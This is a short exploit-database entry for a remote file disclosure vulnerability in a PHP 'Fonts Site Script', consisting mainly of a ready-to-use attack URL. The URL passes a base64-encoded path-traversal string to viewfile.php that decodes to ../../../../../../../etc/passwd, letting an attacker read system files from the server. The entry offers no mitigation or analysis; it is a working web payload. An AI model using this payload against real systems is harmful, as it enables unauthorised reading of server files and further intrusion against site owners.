id: 10816
date: 02/09/2010
title: Fonts Site Script Remote File Disclosure Vulnerability
author: JiKo
cves: 

======================================================
Fonts Site Script Remote File Disclosure Vulnerability
======================================================

| Exploit:
.:|http://localhost/[Script]/classes/viewfile.php?f=[file base64 encode ]
~EX
http://server/fontssite/viewfile.php?f=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
base64 encode =>../../../../../../../etc/passwd
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==



#  0day.today [2023-03-26]  #